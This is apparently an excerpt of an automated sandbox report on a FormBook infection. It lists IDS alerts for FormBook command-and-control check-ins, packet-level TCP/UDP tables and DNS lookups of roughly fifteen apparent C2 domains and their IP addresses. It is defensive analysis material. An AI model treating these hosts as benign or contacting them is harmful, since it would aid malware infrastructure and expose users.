                                                                                          192.168.2.538.143.25.23249805802031453 05/25/22-00:38:29.606349TCP2031453ET TROJAN FormBook CnC Checkin (GET)4980580192.168.2.538.143.25.232
                                                                                          192.168.2.5104.21.27.13249811802031453 05/25/22-00:39:20.297081TCP2031453ET TROJAN FormBook CnC Checkin (GET)4981180192.168.2.5104.21.27.132
                                                                                          192.168.2.5165.231.150.7549795802031453 05/25/22-00:37:41.464118TCP2031453ET TROJAN FormBook CnC Checkin (GET)4979580192.168.2.5165.231.150.75
                                                                                          192.168.2.5156.226.250.15049796802031449 05/25/22-00:37:47.119066TCP2031449ET TROJAN FormBook CnC Checkin (GET)4979680192.168.2.5156.226.250.150
                                                                                          192.168.2.5209.141.38.7149797802031412 05/25/22-00:37:52.815294TCP2031412ET TROJAN FormBook CnC Checkin (GET)4979780192.168.2.5209.141.38.71
                                                                                          192.168.2.5209.141.38.7149797802031453 05/25/22-00:37:52.815294TCP2031453ET TROJAN FormBook CnC Checkin (GET)4979780192.168.2.5209.141.38.71
                                                                                          192.168.2.5172.67.219.1949815802031449 05/25/22-00:39:30.985747TCP2031449ET TROJAN FormBook CnC Checkin (GET)4981580192.168.2.5172.67.219.19
                                                                                          192.168.2.5217.160.0.20649817802031449 05/25/22-00:39:41.286145TCP2031449ET TROJAN FormBook CnC Checkin (GET)4981780192.168.2.5217.160.0.206
                                                                                          192.168.2.537.97.135.18849790802031453 05/25/22-00:37:20.692347TCP2031453ET TROJAN FormBook CnC Checkin (GET)4979080192.168.2.537.97.135.188
                                                                                          192.168.2.5104.21.27.13249811802031412 05/25/22-00:39:20.297081TCP2031412ET TROJAN FormBook CnC Checkin (GET)4981180192.168.2.5104.21.27.132
                                                                                          192.168.2.537.97.135.18849790802031412 05/25/22-00:37:20.692347TCP2031412ET TROJAN FormBook CnC Checkin (GET)4979080192.168.2.537.97.135.188
                                                                                          192.168.2.538.143.25.23249805802031449 05/25/22-00:38:29.606349TCP2031449ET TROJAN FormBook CnC Checkin (GET)4980580192.168.2.538.143.25.232
                                                                                          192.168.2.5165.231.150.7549795802031412 05/25/22-00:37:41.464118TCP2031412ET TROJAN FormBook CnC Checkin (GET)4979580192.168.2.5165.231.150.75
                                                                                          192.168.2.5198.54.117.21749813802031449 05/25/22-00:39:25.738101TCP2031449ET TROJAN FormBook CnC Checkin (GET)4981380192.168.2.5198.54.117.217

                                                                                          Network Port Distribution

                                                                                          TCP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          May 25, 2022 00:37:20.661077023 CEST4979080192.168.2.537.97.135.188
                                                                                          May 25, 2022 00:37:20.692079067 CEST804979037.97.135.188192.168.2.5
                                                                                          May 25, 2022 00:37:20.692162037 CEST4979080192.168.2.537.97.135.188
                                                                                          May 25, 2022 00:37:20.692347050 CEST4979080192.168.2.537.97.135.188
                                                                                          May 25, 2022 00:37:20.725893974 CEST804979037.97.135.188192.168.2.5
                                                                                          May 25, 2022 00:37:20.725965977 CEST804979037.97.135.188192.168.2.5
                                                                                          May 25, 2022 00:37:20.726586103 CEST804979037.97.135.188192.168.2.5
                                                                                          May 25, 2022 00:37:20.726684093 CEST4979080192.168.2.537.97.135.188
                                                                                          May 25, 2022 00:37:20.728179932 CEST4979080192.168.2.537.97.135.188
                                                                                          May 25, 2022 00:37:20.760222912 CEST804979037.97.135.188192.168.2.5
                                                                                          May 25, 2022 00:37:30.793369055 CEST4979180192.168.2.523.227.38.74
                                                                                          May 25, 2022 00:37:30.814016104 CEST804979123.227.38.74192.168.2.5
                                                                                          May 25, 2022 00:37:30.814184904 CEST4979180192.168.2.523.227.38.74
                                                                                          May 25, 2022 00:37:30.851277113 CEST4979180192.168.2.523.227.38.74
                                                                                          May 25, 2022 00:37:30.872692108 CEST804979123.227.38.74192.168.2.5
                                                                                          May 25, 2022 00:37:30.916320086 CEST804979123.227.38.74192.168.2.5
                                                                                          May 25, 2022 00:37:30.916357040 CEST804979123.227.38.74192.168.2.5
                                                                                          May 25, 2022 00:37:30.916374922 CEST804979123.227.38.74192.168.2.5
                                                                                          May 25, 2022 00:37:30.916393995 CEST804979123.227.38.74192.168.2.5
                                                                                          May 25, 2022 00:37:30.916407108 CEST804979123.227.38.74192.168.2.5
                                                                                          May 25, 2022 00:37:30.916419983 CEST804979123.227.38.74192.168.2.5
                                                                                          May 25, 2022 00:37:30.916433096 CEST804979123.227.38.74192.168.2.5
                                                                                          May 25, 2022 00:37:30.916493893 CEST4979180192.168.2.523.227.38.74
                                                                                          May 25, 2022 00:37:30.916593075 CEST4979180192.168.2.523.227.38.74
                                                                                          May 25, 2022 00:37:30.936316013 CEST4979180192.168.2.523.227.38.74
                                                                                          May 25, 2022 00:37:35.999466896 CEST4979380192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:37:36.024611950 CEST804979334.102.136.180192.168.2.5
                                                                                          May 25, 2022 00:37:36.025650024 CEST4979380192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:37:36.025887966 CEST4979380192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:37:36.051178932 CEST804979334.102.136.180192.168.2.5
                                                                                          May 25, 2022 00:37:36.150230885 CEST804979334.102.136.180192.168.2.5
                                                                                          May 25, 2022 00:37:36.150414944 CEST804979334.102.136.180192.168.2.5
                                                                                          May 25, 2022 00:37:36.150701046 CEST4979380192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:37:36.150758982 CEST4979380192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:37:36.173666954 CEST804979334.102.136.180192.168.2.5
                                                                                          May 25, 2022 00:37:41.342313051 CEST4979580192.168.2.5165.231.150.75
                                                                                          May 25, 2022 00:37:41.461620092 CEST8049795165.231.150.75192.168.2.5
                                                                                          May 25, 2022 00:37:41.461791039 CEST4979580192.168.2.5165.231.150.75
                                                                                          May 25, 2022 00:37:41.464118004 CEST4979580192.168.2.5165.231.150.75
                                                                                          May 25, 2022 00:37:41.582832098 CEST8049795165.231.150.75192.168.2.5
                                                                                          May 25, 2022 00:37:41.582911015 CEST8049795165.231.150.75192.168.2.5
                                                                                          May 25, 2022 00:37:41.582940102 CEST8049795165.231.150.75192.168.2.5
                                                                                          May 25, 2022 00:37:41.583089113 CEST4979580192.168.2.5165.231.150.75
                                                                                          May 25, 2022 00:37:41.583175898 CEST4979580192.168.2.5165.231.150.75
                                                                                          May 25, 2022 00:37:41.701999903 CEST8049795165.231.150.75192.168.2.5
                                                                                          May 25, 2022 00:37:46.799782038 CEST4979680192.168.2.5156.226.250.150
                                                                                          May 25, 2022 00:37:47.118558884 CEST8049796156.226.250.150192.168.2.5
                                                                                          May 25, 2022 00:37:47.118762970 CEST4979680192.168.2.5156.226.250.150
                                                                                          May 25, 2022 00:37:47.119066000 CEST4979680192.168.2.5156.226.250.150
                                                                                          May 25, 2022 00:37:47.437657118 CEST8049796156.226.250.150192.168.2.5
                                                                                          May 25, 2022 00:37:47.438154936 CEST8049796156.226.250.150192.168.2.5
                                                                                          May 25, 2022 00:37:47.438170910 CEST8049796156.226.250.150192.168.2.5
                                                                                          May 25, 2022 00:37:47.438314915 CEST4979680192.168.2.5156.226.250.150
                                                                                          May 25, 2022 00:37:47.438410044 CEST4979680192.168.2.5156.226.250.150
                                                                                          May 25, 2022 00:37:47.756680012 CEST8049796156.226.250.150192.168.2.5
                                                                                          May 25, 2022 00:37:52.624475002 CEST4979780192.168.2.5209.141.38.71
                                                                                          May 25, 2022 00:37:52.813425064 CEST8049797209.141.38.71192.168.2.5
                                                                                          May 25, 2022 00:37:52.815067053 CEST4979780192.168.2.5209.141.38.71
                                                                                          May 25, 2022 00:37:52.815294027 CEST4979780192.168.2.5209.141.38.71
                                                                                          May 25, 2022 00:37:53.008251905 CEST8049797209.141.38.71192.168.2.5
                                                                                          May 25, 2022 00:37:53.008518934 CEST8049797209.141.38.71192.168.2.5
                                                                                          May 25, 2022 00:37:53.008539915 CEST8049797209.141.38.71192.168.2.5
                                                                                          May 25, 2022 00:37:53.009113073 CEST4979780192.168.2.5209.141.38.71
                                                                                          May 25, 2022 00:37:53.009255886 CEST4979780192.168.2.5209.141.38.71
                                                                                          May 25, 2022 00:37:53.195764065 CEST8049797209.141.38.71192.168.2.5
                                                                                          May 25, 2022 00:37:58.059820890 CEST4979880192.168.2.5198.54.117.210
                                                                                          May 25, 2022 00:37:58.239289045 CEST8049798198.54.117.210192.168.2.5
                                                                                          May 25, 2022 00:37:58.239367962 CEST4979880192.168.2.5198.54.117.210
                                                                                          May 25, 2022 00:37:58.239535093 CEST4979880192.168.2.5198.54.117.210
                                                                                          May 25, 2022 00:37:58.418458939 CEST8049798198.54.117.210192.168.2.5
                                                                                          May 25, 2022 00:37:58.418483019 CEST8049798198.54.117.210192.168.2.5
                                                                                          May 25, 2022 00:38:03.465059996 CEST4979980192.168.2.5104.16.100.51
                                                                                          May 25, 2022 00:38:03.488214970 CEST8049799104.16.100.51192.168.2.5
                                                                                          May 25, 2022 00:38:03.488447905 CEST4979980192.168.2.5104.16.100.51
                                                                                          May 25, 2022 00:38:03.488841057 CEST4979980192.168.2.5104.16.100.51
                                                                                          May 25, 2022 00:38:03.511718988 CEST8049799104.16.100.51192.168.2.5
                                                                                          May 25, 2022 00:38:03.523833036 CEST8049799104.16.100.51192.168.2.5
                                                                                          May 25, 2022 00:38:03.523925066 CEST8049799104.16.100.51192.168.2.5
                                                                                          May 25, 2022 00:38:03.524005890 CEST4979980192.168.2.5104.16.100.51
                                                                                          May 25, 2022 00:38:03.524063110 CEST4979980192.168.2.5104.16.100.51
                                                                                          May 25, 2022 00:38:03.546835899 CEST8049799104.16.100.51192.168.2.5
                                                                                          May 25, 2022 00:38:08.738053083 CEST4980280192.168.2.515.197.142.173
                                                                                          May 25, 2022 00:38:08.760759115 CEST804980215.197.142.173192.168.2.5
                                                                                          May 25, 2022 00:38:08.760854959 CEST4980280192.168.2.515.197.142.173
                                                                                          May 25, 2022 00:38:08.761045933 CEST4980280192.168.2.515.197.142.173
                                                                                          May 25, 2022 00:38:08.783652067 CEST804980215.197.142.173192.168.2.5
                                                                                          May 25, 2022 00:38:08.813968897 CEST804980215.197.142.173192.168.2.5
                                                                                          May 25, 2022 00:38:08.814003944 CEST804980215.197.142.173192.168.2.5
                                                                                          May 25, 2022 00:38:08.814198017 CEST4980280192.168.2.515.197.142.173
                                                                                          May 25, 2022 00:38:08.827193022 CEST804980215.197.142.173192.168.2.5
                                                                                          May 25, 2022 00:38:08.827344894 CEST4980280192.168.2.515.197.142.173
                                                                                          May 25, 2022 00:38:08.844485998 CEST4980280192.168.2.515.197.142.173
                                                                                          May 25, 2022 00:38:08.868444920 CEST804980215.197.142.173192.168.2.5
                                                                                          May 25, 2022 00:38:13.882728100 CEST4980380192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:38:13.906682014 CEST804980334.102.136.180192.168.2.5
                                                                                          May 25, 2022 00:38:13.906847000 CEST4980380192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:38:13.906961918 CEST4980380192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:38:13.930476904 CEST804980334.102.136.180192.168.2.5
                                                                                          May 25, 2022 00:38:14.031169891 CEST804980334.102.136.180192.168.2.5
                                                                                          May 25, 2022 00:38:14.031200886 CEST804980334.102.136.180192.168.2.5
                                                                                          May 25, 2022 00:38:14.031368971 CEST4980380192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:38:14.031408072 CEST4980380192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:38:14.332645893 CEST4980380192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:38:14.357192039 CEST804980334.102.136.180192.168.2.5
                                                                                          May 25, 2022 00:38:19.078668118 CEST4980480192.168.2.534.117.168.233
                                                                                          May 25, 2022 00:38:19.102339029 CEST804980434.117.168.233192.168.2.5
                                                                                          May 25, 2022 00:38:19.102459908 CEST4980480192.168.2.534.117.168.233
                                                                                          May 25, 2022 00:38:19.102739096 CEST4980480192.168.2.534.117.168.233
                                                                                          May 25, 2022 00:38:19.127269983 CEST804980434.117.168.233192.168.2.5
                                                                                          May 25, 2022 00:38:19.173266888 CEST804980434.117.168.233192.168.2.5
                                                                                          May 25, 2022 00:38:19.173296928 CEST804980434.117.168.233192.168.2.5
                                                                                          May 25, 2022 00:38:19.173317909 CEST804980434.117.168.233192.168.2.5
                                                                                          May 25, 2022 00:38:19.173332930 CEST804980434.117.168.233192.168.2.5
                                                                                          May 25, 2022 00:38:19.173348904 CEST804980434.117.168.233192.168.2.5
                                                                                          May 25, 2022 00:38:19.173547983 CEST4980480192.168.2.534.117.168.233
                                                                                          May 25, 2022 00:38:19.173577070 CEST4980480192.168.2.534.117.168.233
                                                                                          May 25, 2022 00:38:19.173579931 CEST4980480192.168.2.534.117.168.233
                                                                                          May 25, 2022 00:38:29.424401045 CEST4980580192.168.2.538.143.25.232
                                                                                          May 25, 2022 00:38:29.604003906 CEST804980538.143.25.232192.168.2.5
                                                                                          May 25, 2022 00:38:29.604204893 CEST4980580192.168.2.538.143.25.232
                                                                                          May 25, 2022 00:38:29.606348991 CEST4980580192.168.2.538.143.25.232
                                                                                          May 25, 2022 00:38:29.785722017 CEST804980538.143.25.232192.168.2.5
                                                                                          May 25, 2022 00:38:29.785756111 CEST804980538.143.25.232192.168.2.5
                                                                                          May 25, 2022 00:38:29.785772085 CEST804980538.143.25.232192.168.2.5
                                                                                          May 25, 2022 00:38:29.785974026 CEST4980580192.168.2.538.143.25.232
                                                                                          May 25, 2022 00:38:30.027720928 CEST4980580192.168.2.538.143.25.232
                                                                                          May 25, 2022 00:38:30.207782984 CEST804980538.143.25.232192.168.2.5
                                                                                          May 25, 2022 00:38:35.118177891 CEST4980680192.168.2.581.171.22.6
                                                                                          May 25, 2022 00:38:35.148804903 CEST804980681.171.22.6192.168.2.5
                                                                                          May 25, 2022 00:38:35.148958921 CEST4980680192.168.2.581.171.22.6
                                                                                          May 25, 2022 00:38:35.149188995 CEST4980680192.168.2.581.171.22.6
                                                                                          May 25, 2022 00:38:35.180242062 CEST804980681.171.22.6192.168.2.5
                                                                                          May 25, 2022 00:38:35.213639975 CEST804980681.171.22.6192.168.2.5
                                                                                          May 25, 2022 00:38:35.213973999 CEST4980680192.168.2.581.171.22.6
                                                                                          May 25, 2022 00:38:35.214118004 CEST804980681.171.22.6192.168.2.5
                                                                                          May 25, 2022 00:38:35.214227915 CEST4980680192.168.2.581.171.22.6
                                                                                          May 25, 2022 00:38:35.244617939 CEST804980681.171.22.6192.168.2.5
                                                                                          May 25, 2022 00:38:40.296355963 CEST4980880192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:38:40.321113110 CEST804980834.102.136.180192.168.2.5
                                                                                          May 25, 2022 00:38:40.321276903 CEST4980880192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:38:40.324682951 CEST4980880192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:38:40.349323988 CEST804980834.102.136.180192.168.2.5
                                                                                          May 25, 2022 00:38:40.447870016 CEST804980834.102.136.180192.168.2.5
                                                                                          May 25, 2022 00:38:40.447915077 CEST804980834.102.136.180192.168.2.5
                                                                                          May 25, 2022 00:38:40.448122978 CEST4980880192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:38:40.448157072 CEST4980880192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:38:40.756629944 CEST4980880192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:38:40.781158924 CEST804980834.102.136.180192.168.2.5
                                                                                          May 25, 2022 00:39:04.533901930 CEST4980980192.168.2.5198.54.117.218
                                                                                          May 25, 2022 00:39:04.706679106 CEST8049809198.54.117.218192.168.2.5
                                                                                          May 25, 2022 00:39:04.706762075 CEST4980980192.168.2.5198.54.117.218
                                                                                          May 25, 2022 00:39:04.706912041 CEST4980980192.168.2.5198.54.117.218
                                                                                          May 25, 2022 00:39:04.879970074 CEST8049809198.54.117.218192.168.2.5
                                                                                          May 25, 2022 00:39:04.879993916 CEST8049809198.54.117.218192.168.2.5
                                                                                          May 25, 2022 00:39:14.949737072 CEST4981080192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:39:14.975008011 CEST804981034.102.136.180192.168.2.5
                                                                                          May 25, 2022 00:39:14.975383043 CEST4981080192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:39:14.975522041 CEST4981080192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:39:15.000293016 CEST804981034.102.136.180192.168.2.5
                                                                                          May 25, 2022 00:39:15.099600077 CEST804981034.102.136.180192.168.2.5
                                                                                          May 25, 2022 00:39:15.099642992 CEST804981034.102.136.180192.168.2.5
                                                                                          May 25, 2022 00:39:15.099984884 CEST4981080192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:39:15.100075006 CEST4981080192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:39:15.400177956 CEST4981080192.168.2.534.102.136.180
                                                                                          May 25, 2022 00:39:15.422959089 CEST804981034.102.136.180192.168.2.5
                                                                                          May 25, 2022 00:39:20.254220009 CEST4981180192.168.2.5104.21.27.132
                                                                                          May 25, 2022 00:39:20.291886091 CEST8049811104.21.27.132192.168.2.5
                                                                                          May 25, 2022 00:39:20.291977882 CEST4981180192.168.2.5104.21.27.132
                                                                                          May 25, 2022 00:39:20.297080994 CEST4981180192.168.2.5104.21.27.132
                                                                                          May 25, 2022 00:39:20.334809065 CEST8049811104.21.27.132192.168.2.5
                                                                                          May 25, 2022 00:39:20.511228085 CEST8049811104.21.27.132192.168.2.5
                                                                                          May 25, 2022 00:39:20.511270046 CEST8049811104.21.27.132192.168.2.5
                                                                                          May 25, 2022 00:39:20.511286974 CEST8049811104.21.27.132192.168.2.5
                                                                                          May 25, 2022 00:39:20.511437893 CEST4981180192.168.2.5104.21.27.132
                                                                                          May 25, 2022 00:39:20.515574932 CEST4981180192.168.2.5104.21.27.132
                                                                                          May 25, 2022 00:39:25.562496901 CEST4981380192.168.2.5198.54.117.217
                                                                                          May 25, 2022 00:39:25.737798929 CEST8049813198.54.117.217192.168.2.5
                                                                                          May 25, 2022 00:39:25.737900019 CEST4981380192.168.2.5198.54.117.217
                                                                                          May 25, 2022 00:39:25.738101006 CEST4981380192.168.2.5198.54.117.217
                                                                                          May 25, 2022 00:39:25.913206100 CEST8049813198.54.117.217192.168.2.5
                                                                                          May 25, 2022 00:39:25.913234949 CEST8049813198.54.117.217192.168.2.5
                                                                                          May 25, 2022 00:39:30.949255943 CEST4981580192.168.2.5172.67.219.19
                                                                                          May 25, 2022 00:39:30.985327005 CEST8049815172.67.219.19192.168.2.5
                                                                                          May 25, 2022 00:39:30.985532045 CEST4981580192.168.2.5172.67.219.19
                                                                                          May 25, 2022 00:39:30.985747099 CEST4981580192.168.2.5172.67.219.19
                                                                                          May 25, 2022 00:39:31.021616936 CEST8049815172.67.219.19192.168.2.5
                                                                                          May 25, 2022 00:39:31.035084009 CEST8049815172.67.219.19192.168.2.5
                                                                                          May 25, 2022 00:39:31.035409927 CEST4981580192.168.2.5172.67.219.19
                                                                                          May 25, 2022 00:39:31.073637962 CEST8049815172.67.219.19192.168.2.5
                                                                                          May 25, 2022 00:39:31.280896902 CEST8049815172.67.219.19192.168.2.5
                                                                                          May 25, 2022 00:39:31.281116009 CEST4981580192.168.2.5172.67.219.19
                                                                                          May 25, 2022 00:39:36.104743958 CEST4981680192.168.2.534.117.168.233
                                                                                          May 25, 2022 00:39:36.125197887 CEST804981634.117.168.233192.168.2.5
                                                                                          May 25, 2022 00:39:36.125324011 CEST4981680192.168.2.534.117.168.233
                                                                                          May 25, 2022 00:39:36.125531912 CEST4981680192.168.2.534.117.168.233
                                                                                          May 25, 2022 00:39:36.145849943 CEST804981634.117.168.233192.168.2.5
                                                                                          May 25, 2022 00:39:36.192634106 CEST804981634.117.168.233192.168.2.5
                                                                                          May 25, 2022 00:39:36.192663908 CEST804981634.117.168.233192.168.2.5
                                                                                          May 25, 2022 00:39:36.192679882 CEST804981634.117.168.233192.168.2.5
                                                                                          May 25, 2022 00:39:36.192693949 CEST804981634.117.168.233192.168.2.5
                                                                                          May 25, 2022 00:39:36.192837000 CEST4981680192.168.2.534.117.168.233
                                                                                          May 25, 2022 00:39:36.192903996 CEST4981680192.168.2.534.117.168.233
                                                                                          May 25, 2022 00:39:36.192998886 CEST4981680192.168.2.534.117.168.233
                                                                                          May 25, 2022 00:39:41.260881901 CEST4981780192.168.2.5217.160.0.206
                                                                                          May 25, 2022 00:39:41.285892010 CEST8049817217.160.0.206192.168.2.5
                                                                                          May 25, 2022 00:39:41.285991907 CEST4981780192.168.2.5217.160.0.206
                                                                                          May 25, 2022 00:39:41.286144972 CEST4981780192.168.2.5217.160.0.206
                                                                                          May 25, 2022 00:39:41.311017036 CEST8049817217.160.0.206192.168.2.5
                                                                                          May 25, 2022 00:39:41.412096977 CEST8049817217.160.0.206192.168.2.5
                                                                                          May 25, 2022 00:39:41.412117958 CEST8049817217.160.0.206192.168.2.5
                                                                                          May 25, 2022 00:39:41.412290096 CEST4981780192.168.2.5217.160.0.206
                                                                                          May 25, 2022 00:39:41.412372112 CEST4981780192.168.2.5217.160.0.206
                                                                                          May 25, 2022 00:39:41.438489914 CEST8049817217.160.0.206192.168.2.5
                                                                                          May 25, 2022 00:39:46.419382095 CEST4981880192.168.2.5104.16.100.51
                                                                                          May 25, 2022 00:39:46.440320969 CEST8049818104.16.100.51192.168.2.5
                                                                                          May 25, 2022 00:39:46.440543890 CEST4981880192.168.2.5104.16.100.51
                                                                                          May 25, 2022 00:39:46.440790892 CEST4981880192.168.2.5104.16.100.51
                                                                                          May 25, 2022 00:39:46.461595058 CEST8049818104.16.100.51192.168.2.5
                                                                                          May 25, 2022 00:39:46.475223064 CEST8049818104.16.100.51192.168.2.5
                                                                                          May 25, 2022 00:39:46.477160931 CEST4981880192.168.2.5104.16.100.51
                                                                                          May 25, 2022 00:39:46.498177052 CEST8049818104.16.100.51192.168.2.5
                                                                                          May 25, 2022 00:39:46.697226048 CEST8049818104.16.100.51192.168.2.5
                                                                                          May 25, 2022 00:39:46.697551012 CEST4981880192.168.2.5104.16.100.51
                                                                                          May 25, 2022 00:39:51.481518030 CEST4981980192.168.2.515.197.142.173
                                                                                          May 25, 2022 00:39:51.504615068 CEST804981915.197.142.173192.168.2.5
                                                                                          May 25, 2022 00:39:51.504955053 CEST4981980192.168.2.515.197.142.173
                                                                                          May 25, 2022 00:39:51.504981041 CEST4981980192.168.2.515.197.142.173
                                                                                          May 25, 2022 00:39:51.527761936 CEST804981915.197.142.173192.168.2.5
                                                                                          May 25, 2022 00:39:51.556776047 CEST804981915.197.142.173192.168.2.5
                                                                                          May 25, 2022 00:39:51.556796074 CEST804981915.197.142.173192.168.2.5
                                                                                          May 25, 2022 00:39:51.557105064 CEST4981980192.168.2.515.197.142.173
                                                                                          May 25, 2022 00:39:51.557229996 CEST4981980192.168.2.515.197.142.173
                                                                                          May 25, 2022 00:39:51.569927931 CEST804981915.197.142.173192.168.2.5
                                                                                          May 25, 2022 00:39:51.570024967 CEST4981980192.168.2.515.197.142.173
                                                                                          May 25, 2022 00:39:51.580374002 CEST804981915.197.142.173192.168.2.5
                                                                                          May 25, 2022 00:39:51.580393076 CEST804981915.197.142.173192.168.2.5
                                                                                          May 25, 2022 00:39:51.580466032 CEST4981980192.168.2.515.197.142.173

                                                                                          UDP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          May 25, 2022 00:37:20.610285997 CEST6353853192.168.2.58.8.8.8
                                                                                          May 25, 2022 00:37:20.655066967 CEST53635388.8.8.8192.168.2.5
                                                                                          May 25, 2022 00:37:30.757116079 CEST6147853192.168.2.58.8.8.8
                                                                                          May 25, 2022 00:37:30.792267084 CEST53614788.8.8.8192.168.2.5
                                                                                          May 25, 2022 00:37:35.969811916 CEST5535553192.168.2.58.8.8.8
                                                                                          May 25, 2022 00:37:35.998270988 CEST53553558.8.8.8192.168.2.5
                                                                                          May 25, 2022 00:37:41.161659956 CEST5233353192.168.2.58.8.8.8
                                                                                          May 25, 2022 00:37:41.340441942 CEST53523338.8.8.8192.168.2.5
                                                                                          May 25, 2022 00:37:46.608026981 CEST4940753192.168.2.58.8.8.8
                                                                                          May 25, 2022 00:37:46.798290014 CEST53494078.8.8.8192.168.2.5
                                                                                          May 25, 2022 00:37:52.482887983 CEST4991253192.168.2.58.8.8.8
                                                                                          May 25, 2022 00:37:52.620114088 CEST53499128.8.8.8192.168.2.5
                                                                                          May 25, 2022 00:37:58.022788048 CEST6348853192.168.2.58.8.8.8
                                                                                          May 25, 2022 00:37:58.051512957 CEST53634888.8.8.8192.168.2.5
                                                                                          May 25, 2022 00:38:03.430937052 CEST5799053192.168.2.58.8.8.8
                                                                                          May 25, 2022 00:38:03.462830067 CEST53579908.8.8.8192.168.2.5
                                                                                          May 25, 2022 00:38:08.638864040 CEST5446353192.168.2.58.8.8.8
                                                                                          May 25, 2022 00:38:08.696748972 CEST53544638.8.8.8192.168.2.5
                                                                                          May 25, 2022 00:38:13.852001905 CEST6371853192.168.2.58.8.8.8
                                                                                          May 25, 2022 00:38:13.881675959 CEST53637188.8.8.8192.168.2.5
                                                                                          May 25, 2022 00:38:19.040394068 CEST4941653192.168.2.58.8.8.8
                                                                                          May 25, 2022 00:38:19.076489925 CEST53494168.8.8.8192.168.2.5
                                                                                          May 25, 2022 00:38:24.225178003 CEST6112653192.168.2.58.8.8.8
                                                                                          May 25, 2022 00:38:24.347954988 CEST53611268.8.8.8192.168.2.5
                                                                                          May 25, 2022 00:38:29.353410006 CEST5415253192.168.2.58.8.8.8
                                                                                          May 25, 2022 00:38:29.381230116 CEST53541528.8.8.8192.168.2.5
                                                                                          May 25, 2022 00:38:35.074073076 CEST5425853192.168.2.58.8.8.8
                                                                                          May 25, 2022 00:38:35.116864920 CEST53542588.8.8.8192.168.2.5
                                                                                          May 25, 2022 00:38:40.253873110 CEST5039353192.168.2.58.8.8.8
                                                                                          May 25, 2022 00:38:40.293832064 CEST53503938.8.8.8192.168.2.5
                                                                                          May 25, 2022 00:39:04.502336979 CEST5587053192.168.2.58.8.8.8
                                                                                          May 25, 2022 00:39:04.532608032 CEST53558708.8.8.8192.168.2.5
                                                                                          May 25, 2022 00:39:14.906707048 CEST5485053192.168.2.58.8.8.8
                                                                                          May 25, 2022 00:39:14.948277950 CEST53548508.8.8.8192.168.2.5
                                                                                          May 25, 2022 00:39:20.175956964 CEST6145853192.168.2.58.8.8.8
                                                                                          May 25, 2022 00:39:20.203048944 CEST53614588.8.8.8192.168.2.5
                                                                                          May 25, 2022 00:39:25.530280113 CEST5531653192.168.2.58.8.8.8
                                                                                          May 25, 2022 00:39:25.557332993 CEST53553168.8.8.8192.168.2.5
                                                                                          May 25, 2022 00:39:30.921968937 CEST6270653192.168.2.58.8.8.8
                                                                                          May 25, 2022 00:39:30.947431087 CEST53627068.8.8.8192.168.2.5
                                                                                          May 25, 2022 00:39:36.068521976 CEST5226353192.168.2.58.8.8.8
                                                                                          May 25, 2022 00:39:36.102147102 CEST53522638.8.8.8192.168.2.5
                                                                                          May 25, 2022 00:39:41.203762054 CEST5993353192.168.2.58.8.8.8
                                                                                          May 25, 2022 00:39:41.259789944 CEST53599338.8.8.8192.168.2.5

                                                                                          DNS Queries

                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                          May 25, 2022 00:37:20.610285997 CEST192.168.2.58.8.8.80x9c12Standard query (0)www.deta-hedman.comA (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:37:30.757116079 CEST192.168.2.58.8.8.80xefbeStandard query (0)www.shantellonlineshoph.comA (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:37:35.969811916 CEST192.168.2.58.8.8.80xb745Standard query (0)www.heiboard.xyzA (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:37:41.161659956 CEST192.168.2.58.8.8.80x40fcStandard query (0)www.tsreaur.comA (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:37:46.608026981 CEST192.168.2.58.8.8.80x7fd7Standard query (0)www.iguaym.comA (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:37:52.482887983 CEST192.168.2.58.8.8.80xc97eStandard query (0)www.funserve.clubA (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:37:58.022788048 CEST192.168.2.58.8.8.80x17b6Standard query (0)www.popcornpor.xyzA (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:38:03.430937052 CEST192.168.2.58.8.8.80x3dc1Standard query (0)www.expoj3.comA (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:38:08.638864040 CEST192.168.2.58.8.8.80x5620Standard query (0)www.danilhodoekhi.comA (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:38:13.852001905 CEST192.168.2.58.8.8.80x7c13Standard query (0)www.pieprop.comA (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:38:19.040394068 CEST192.168.2.58.8.8.80x45Standard query (0)www.jamiebakes.netA (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:38:24.225178003 CEST192.168.2.58.8.8.80xe2acStandard query (0)www.gsibralstar1.comA (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:38:29.353410006 CEST192.168.2.58.8.8.80xd50aStandard query (0)www.trustedhomebuying.comA (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:38:35.074073076 CEST192.168.2.58.8.8.80x9abfStandard query (0)www.jupiter-directory.infoA (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:38:40.253873110 CEST192.168.2.58.8.8.80xd246Standard query (0)www.route112mitsubishi.comA (IP address)IN (0x0001)
